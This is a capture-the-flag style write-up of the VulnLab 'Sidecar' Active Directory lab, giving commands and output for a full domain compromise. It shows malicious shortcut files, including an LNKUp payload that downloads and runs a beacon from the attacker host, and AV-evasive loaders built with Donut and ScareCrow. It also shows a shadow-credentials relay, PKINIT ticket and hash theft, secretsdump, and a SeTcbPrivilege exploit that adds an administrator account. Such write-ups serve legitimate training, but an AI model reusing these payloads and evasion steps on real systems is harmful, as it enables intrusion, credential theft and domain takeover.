Post

VulnLab Sidecar

VulnLab Sidecar

VulnLab Sidecar

Sidecar

Recon

1
2
3
└─$ rustscan -g -a 10.10.180.53,10.10.180.54 -r 1-65535
10.10.180.53 -> [53,88,135,139,389,445,464,3268,3269,3389,5985,49664,49667,49669,49670]
10.10.180.54 -> [135,139,445,3389,49408,49409,49410,49411,49412,49414,49417,49418]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
└─$ nmap -sC -sV -p53,88,135,139,389,445,464,3268,3269,3389,5985,49664,49667,49669,49670 10.10.180.53
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-19 20:18 +05
Nmap scan report for 10.10.180.53
Host is up (0.13s latency).

PORT      STATE    SERVICE          VERSION
53/tcp    open     tcpwrapped
88/tcp    open     tcpwrapped
135/tcp   open     tcpwrapped
139/tcp   filtered netbios-ssn
389/tcp   filtered ldap
445/tcp   filtered microsoft-ds
464/tcp   filtered kpasswd5
3268/tcp  filtered globalcatLDAP
3269/tcp  filtered globalcatLDAPssl
3389/tcp  open     ms-wbt-server    Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: SIDECAR
|   NetBIOS_Domain_Name: SIDECAR
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: Sidecar.vl
|   DNS_Computer_Name: DC01.Sidecar.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-01-19T15:17:48+00:00
|_ssl-date: 2025-01-19T15:18:03+00:00; -1m20s from scanner time.
| ssl-cert: Subject: commonName=DC01.Sidecar.vl
| Not valid before: 2025-01-18T15:11:41
|_Not valid after:  2025-07-20T15:11:41
5985/tcp  filtered wsman
49664/tcp filtered unknown
49667/tcp filtered unknown
49669/tcp open     msrpc            Microsoft Windows RPC
49670/tcp open     msrpc            Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1m20s, deviation: 0s, median: -1m20s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.01 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
└─$ nmap -sC -sV -p135,139,445,3389,49408,49409,49410,49411,49412,49414,49417,49418 10.10.180.54
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-19 20:18 +05
Nmap scan report for 10.10.180.54
Host is up (0.18s latency).

PORT      STATE    SERVICE            VERSION
135/tcp   open     tcpwrapped
139/tcp   open     netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds       Windows 10 Enterprise 10240 microsoft-ds (workgroup: SIDECAR)
3389/tcp  open     ssl/ms-wbt-server?
|_ssl-date: 2025-01-19T15:18:21+00:00; -1m21s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: SIDECAR
|   NetBIOS_Domain_Name: SIDECAR
|   NetBIOS_Computer_Name: WS01
|   DNS_Domain_Name: Sidecar.vl
|   DNS_Computer_Name: ws01.Sidecar.vl
|   DNS_Tree_Name: Sidecar.vl
|   Product_Version: 10.0.10240
|_  System_Time: 2025-01-19T15:18:06+00:00
| ssl-cert: Subject: commonName=ws01.Sidecar.vl
| Not valid before: 2025-01-18T15:13:47
|_Not valid after:  2025-07-20T15:13:47
49408/tcp filtered unknown
49409/tcp filtered unknown
49410/tcp filtered unknown
49411/tcp filtered unknown
49412/tcp filtered unknown
49414/tcp filtered unknown
49417/tcp filtered unknown
49418/tcp filtered unknown
Service Info: Host: WS01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows 10 Enterprise 10240 (Windows 10 Enterprise 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: ws01
|   NetBIOS computer name: WS01\x00
|   Domain name: Sidecar.vl
|   Forest name: Sidecar.vl
|   FQDN: ws01.Sidecar.vl
|_  System time: 2025-01-19T16:18:06+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -13m20s, deviation: 26m49s, median: -1m21s
| smb2-time: 
|   date: 2025-01-19T15:18:08
|_  start_date: 2025-01-19T15:13:48
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.33 seconds

WS01.Sidecar.vl

Let’s check if Guest account is enabled

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
└─$ nxc smb targets.txt -u 'Guest' -p '' --shares
SMB         10.10.180.54    445    WS01             [*] Windows 10 Enterprise 10240 x64 (name:WS01) (domain:Sidecar.vl) (signing:False) (SMBv1:True)
SMB         10.10.180.53    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:Sidecar.vl) (signing:True) (SMBv1:False)
SMB         10.10.180.54    445    WS01             [+] Sidecar.vl\Guest: (Guest)
SMB         10.10.180.53    445    DC01             [+] Sidecar.vl\Guest: 
SMB         10.10.180.54    445    WS01             [*] Enumerated shares
SMB         10.10.180.54    445    WS01             Share           Permissions     Remark
SMB         10.10.180.54    445    WS01             -----           -----------     ------
SMB         10.10.180.54    445    WS01             ADMIN$                          Remote Admin
SMB         10.10.180.54    445    WS01             C$                              Default share
SMB         10.10.180.54    445    WS01             IPC$                            Remote IPC
SMB         10.10.180.53    445    DC01             [*] Enumerated shares
SMB         10.10.180.53    445    DC01             Share           Permissions     Remark
SMB         10.10.180.53    445    DC01             -----           -----------     ------
SMB         10.10.180.53    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.180.53    445    DC01             C$                              Default share
SMB         10.10.180.53    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.180.53    445    DC01             NETLOGON                        Logon server share 
SMB         10.10.180.53    445    DC01             Public          READ,WRITE      
SMB         10.10.180.53    445    DC01             SYSVOL                          Logon server share 
Running nxc against 2 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

We can run spider_plus to check content of shares

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
└─$ nxc smb 10.10.180.53 -u 'Guest' -p '' -M spider_plus -o EXCLUDE_DIR=IPC$,NETLOGON,SYSVOL
SMB         10.10.180.53    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:Sidecar.vl) (signing:True) (SMBv1:False)
SMB         10.10.180.53    445    DC01             [+] Sidecar.vl\Guest: 
SPIDER_PLUS 10.10.180.53    445    DC01             [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.180.53    445    DC01             [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS 10.10.180.53    445    DC01             [*]     STATS_FLAG: True
SPIDER_PLUS 10.10.180.53    445    DC01             [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.180.53    445    DC01             [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.180.53    445    DC01             [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.180.53    445    DC01             [*]  OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB         10.10.180.53    445    DC01             [*] Enumerated shares
SMB         10.10.180.53    445    DC01             Share           Permissions     Remark
SMB         10.10.180.53    445    DC01             -----           -----------     ------
SMB         10.10.180.53    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.180.53    445    DC01             C$                              Default share
SMB         10.10.180.53    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.180.53    445    DC01             NETLOGON                        Logon server share 
SMB         10.10.180.53    445    DC01             Public          READ,WRITE      
SMB         10.10.180.53    445    DC01             SYSVOL                          Logon server share 
SPIDER_PLUS 10.10.180.53    445    DC01             [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.180.53.json".
SPIDER_PLUS 10.10.180.53    445    DC01             [*] SMB Shares:           6 (ADMIN$, C$, IPC$, NETLOGON, Public, SYSVOL)
SPIDER_PLUS 10.10.180.53    445    DC01             [*] SMB Readable Shares:  2 (IPC$, Public)
SPIDER_PLUS 10.10.180.53    445    DC01             [*] SMB Writable Shares:  1 (Public)
SPIDER_PLUS 10.10.180.53    445    DC01             [*] SMB Filtered Shares:  1
SPIDER_PLUS 10.10.180.53    445    DC01             [*] Total folders found:  5
SPIDER_PLUS 10.10.180.53    445    DC01             [*] Total files found:    4
SPIDER_PLUS 10.10.180.53    445    DC01             [*] File size average:    1.25 KB
SPIDER_PLUS 10.10.180.53    445    DC01             [*] File size min:        45 B
SPIDER_PLUS 10.10.180.53    445    DC01             [*] File size max:        1.7 KB

The content

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
{
    "Public": {
        "Common/Common.lnk": {
            "atime_epoch": "2023-12-10 20:47:04",
            "ctime_epoch": "2023-12-10 20:23:50",
            "mtime_epoch": "2023-12-17 17:10:17",
            "size": "1.7 KB"
        },
        "Common/Custom/info.txt": {
            "atime_epoch": "2023-12-10 22:08:38",
            "ctime_epoch": "2023-12-10 22:07:43",
            "mtime_epoch": "2023-12-17 17:10:06",
            "size": "45 B"
        },
        "Common/Install.lnk": {
            "atime_epoch": "2023-12-10 20:47:05",
            "ctime_epoch": "2023-12-10 20:25:45",
            "mtime_epoch": "2023-12-17 17:10:17",
            "size": "1.63 KB"
        },
        "Common/Transfer.lnk": {
            "atime_epoch": "2023-12-10 20:47:05",
            "ctime_epoch": "2023-12-10 20:25:47",
            "mtime_epoch": "2023-12-17 17:10:17",
            "size": "1.64 KB"
        }
    }
}

We see that Custom folder is for links and shortcuts

1
2
3
4
5
6
7
8
9
10
# cd Common
# cd Custom
# ls
drw-rw-rw-          0  Sun Dec 17 17:14:14 2023 .
drw-rw-rw-          0  Sun Dec 17 17:09:39 2023 ..
-rw-rw-rw-         45  Sun Dec 17 17:10:06 2023 info.txt
# cat info.txt
Folder for custom shortcuts & internet links.
# 

Let’s try capturing hash

1
2
3
└─$ python3 ~/tools/red-team/ntlm_theft/ntlm_theft.py -g lnk -s 10.8.4.147 -f sidecar 
Created: sidecar/sidecar.lnk (BROWSE TO FOLDER)
Generation Complete.
1
2
# put sidecar/sidecar.lnk
#

It doesn’t work. Wiki specifies that user clicks shortcut files. There’s a LNKUp tool that can generate malicious file with command execution or we can generate it ourselves:

1
C:\Windows\System32\cmd.exe /c net use p: \\10.8.4.147\a

To create lnk file using LNKUp

1
└─$ python2.7 generate.py --execute "C:\Windows\System32\cmd.exe /c powershell -c iwr http://10.8.4.147:8000/demon.exe -o C:\windows\tasks\demon.exe; C:\windows\tasks\demon.exe" --output clickme.lnk --host 10.8.4.147 --type ntlm

We receive connection on Responder but the hash is not crackable

The beacon is also downloaded, but due to AV it get’s killed

We can also use some powershell rev shell to get access.

Let’s create evasive beacon using Donut and Scarecrow

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
└─$ ./donut -i ~/vulnlab/chains/sidecar/demon.exe -a x64 -o ~/vulnlab/chains/sidecar/payload.bin

  [ Donut shellcode generator v1 (built Oct 23 2024 07:56:47)
  [ Copyright (c) 2019-2021 TheWover, Odzhan

WARNING: Invalid architecture specified: 0 -- setting to x86+amd64
  [ Instance type : Embedded
  [ Module file   : "/home/kali/vulnlab/chains/sidecar/demon.exe"
  [ Entropy       : Random names + Encryption
  [ File type     : EXE
  [ Target CPU    : x86+amd64
  [ AMSI/WDLP/ETW : continue
  [ PE Headers    : overwrite
  [ Shellcode     : "/home/kali/vulnlab/chains/sidecar/payload.bin"
  [ Exit          : Thread

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
└─$ ./ScareCrow/ScareCrow -I  ~/vulnlab/chains/sidecar/payload.bin --domain microsoft.com -outpath  ~/vulnlab/chains/sidecar/
 
  _________                           _________                       
 /   _____/ ____ _____ _______   ____ \_   ___ \_______  ______  _  __
 \_____  \_/ ___\\__  \\_  __ \_/ __ \/    \  \/\_  __ \/  _ \ \/ \/ /
 /        \  \___ / __ \|  | \/\  ___/\     \____|  | \(  <_> )     / 
/_______  /\___  >____  /__|    \___  >\______  /|__|   \____/ \/\_/  
        \/     \/     \/            \/        \/                      
                                                        (@Tyl0us)
        “Fear, you must understand is more than a mere obstacle. 
        Fear is a TEACHER. the first one you ever had.”

[*] Encrypting Shellcode Using ELZMA Encryption
[+] Shellcode Encrypted
[+] Patched ETW Enabled
[+] Patched AMSI Enabled
[+] Sleep Timer set for 2699 milliseconds 
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With cmd's Properties
[*] Compiling Payload
[+] Payload Compiled
[*] Signing cmd.exe With a Fake Cert
[+] Signed File Created
[+] Binary Compiled
[!] Sha256 hash of cmd.exe: 1d989fb0d5a71624bc57d69213d84bfe1ae5929ae3614483a33382f718a49230
[*] cmd.exe moved to /home/kali/vulnlab/chains/sidecar/

Download and run it

I noticed that using donut will trigger Window Defender, so had to generate Windows Shellcode and just input it to ScareCrow (also set 10s for sleep, Ekko and indirect syscall). Let’s enumerate domain with Bloodhound

Nothing interesting for current user. Seems like there’s also ADCS (Cert Publishers group in bloodhound or run certutil). We can try try performing RBCD or Shadow Credentials attack to takeover WS01. We need to checm MachineAccountQuota

Seems like we can’t create fake computer, so let’s perform Shadow Crenedtials attack then:

  • https://www.fortalicesolutions.com/posts/shadow-credentials-workstation-takeover-edition

To perform it we need to relay from HTTP to LDAP, thus we need to check if WebDAV is enabled on machine. We can use GetWebDAVStatus

It’s not. We have to start it

Now we need to manipulate DNS records by adding our attacker host. We can use UnmanagedPowerShell or Sharpmad

Now, we can perform relay attack. We can coerce it using SpoolSample. Start ntlmrelayx first

1
2
└─$ ntlmrelayx.py -t ldap://dc01.sidecar.vl --shadow-credentials --shadow-target 'ws01$' --no-dump --no-da 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Now coerce

We receive connection

Now, we can use PKINITtools to continue our exploitation. Get TGT

1
2
3
4
5
6
7
8
9
10
11
12
└─$ python3 ~/tools/red-team/PKINITtools/gettgtpkinit.py -cert-pfx rGHT11yH.pfx -pfx-pass zAkBJFsgFVMuCHZAoyD3 Sidecar.vl/ws01$ rGHT11yH.ccache
2025-01-20 01:36:49,115 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-01-20 01:36:49,127 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2025-01-20 01:37:03,916 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-01-20 01:37:03,917 minikerberos INFO     0582b10645710e1bda8cac4c06c3729bc252feef8e6cd0dbb63809db7ebfa709
INFO:minikerberos:0582b10645710e1bda8cac4c06c3729bc252feef8e6cd0dbb63809db7ebfa709
2025-01-20 01:37:03,919 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file

Retrieve hash just in case using TGT

1
2
3
4
5
6
7
8
9
10
11
└─$ KRB5CCNAME=rGHT11yH.ccache python3 ~/tools/red-team/PKINITtools/getnthash.py -key 0582b10645710e1bda8cac4c06c3729bc252feef8e6cd0dbb63809db7ebfa709 sidecar.vl/ws01$
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Using TGT from cache
/home/kali/tools/red-team/PKINITtools/getnthash.py:144: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/home/kali/tools/red-team/PKINITtools/getnthash.py:192: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting ticket to self with PAC
Recovered NT Hash
<REDACTED>

Impersonate the administrator

1
2
3
4
5
6
7
└─$ python3 ~/tools/red-team/PKINITtools/gets4uticket.py kerberos+ccache://sidecar.vl\\ws01\$:rGHT11yH.ccache@dc01.sidecar.vl cifs/ws01.sidecar.vl@sidecar.vl administrator@sidecar.vl administratr.ccache -v           
2025-01-20 01:40:33,686 minikerberos INFO     Trying to get SPN with administrator@sidecar.vl for cifs/ws01.sidecar.vl@sidecar.vl
INFO:minikerberos:Trying to get SPN with administrator@sidecar.vl for cifs/ws01.sidecar.vl@sidecar.vl
2025-01-20 01:40:33,878 minikerberos INFO     Success!
INFO:minikerberos:Success!
2025-01-20 01:40:33,878 minikerberos INFO     Done!
INFO:minikerberos:Done!

Dump secrets

1
2
3
4
5
6
7
8
9
10
11
12
└─$ KRB5CCNAME=administratr.ccache secretsdump.py -k -no-pass ws01.sidecar.vl 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x1e7d0e7d432413f4ac3097f112b17322
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
<SNIP>
SIDECAR\WS01$:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
<SNIP>

DC01.Sidecar.vl

We dumped hsh for Deployer account, which could be related to svc_deploy account in domain, which has PSRemote privileges

We can crack it in crackstation

Let’s check if there’s password reuse with svc_deploy:<REDACTED>

1
2
3
└─$ nxc smb 10.10.180.53 -u 'svc_deploy' -p '<REDACTED>'
SMB         10.10.180.53    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:Sidecar.vl) (signing:True) (SMBv1:False)
SMB         10.10.180.53    445    DC01             [+] Sidecar.vl\svc_deploy:<REDACTED> 
1
2
3
└─$ nxc winrm 10.10.180.53 -u 'svc_deploy' -p '<REDACTED>'
WINRM       10.10.180.53    5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:Sidecar.vl)
WINRM       10.10.180.53    5985   DC01             [+] Sidecar.vl\svc_deploy:<REDACTED> (Pwn3d!)

Now we can connect to DC using evil-winrm and check privileges

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami /all

USER INFORMATION
----------------

User Name          SID
================== =============================================
sidecar\svc_deploy S-1-5-21-3976908837-939936849-1028625813-1610


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                           Attributes
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
SIDECAR\Installer                          Group            S-1-5-21-3976908837-939936849-1028625813-1611 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeTcbPrivilege                Act as part of the operating system Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

We have SeTcbPrivilege privilege, so we can use thic PoC

1
2
3
4
5
6
7
8
*Evil-WinRM* PS C:\ProgramData> upload ../../../tools/red-team/c2-toolkit/SeTcbPrivilege.exe
                                        
Info: Uploading /home/kali/vulnlab/chains/sidecar/../../../tools/red-team/c2-toolkit/SeTcbPrivilege.exe to C:\ProgramData\SeTcbPrivilege.exe
                                        
Data: 17064 bytes of 17064 bytes copied
                                        
Info: Upload successful!

1
2
3
4
5
6
7
8
9
10
11
12
13
*Evil-WinRM* PS C:\ProgramData> .\SeTcbPrivilege.exe pwn "C:\Windows\System32\cmd.exe /c net user pentest P@ssw0rd /add && net localgroup administrators pentest /add"
Error starting service 1053
*Evil-WinRM* PS C:\ProgramData> net user

User accounts for \\

-------------------------------------------------------------------------------
A.Roberts                Administrator            E.Klaymore
Guest                    J.Chaffrey               krbtgt
M.smith                  O.osvald                 P.robinson
pentest                  svc_deploy
The command completed with one or more errors.

Connect as newly created user

1
2
3
4
5
6
7
8
9
10
└─$ evil-winrm -i dc01.sidecar.vl -u 'pentest' -p 'P@ssw0rd'   
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\pentest\Documents>

https://api.vulnlab.com/api/v1/share?id=771e8a34-950c-4913-a5ee-6bec30caac05

This post is licensed under CC BY 4.0 by the author.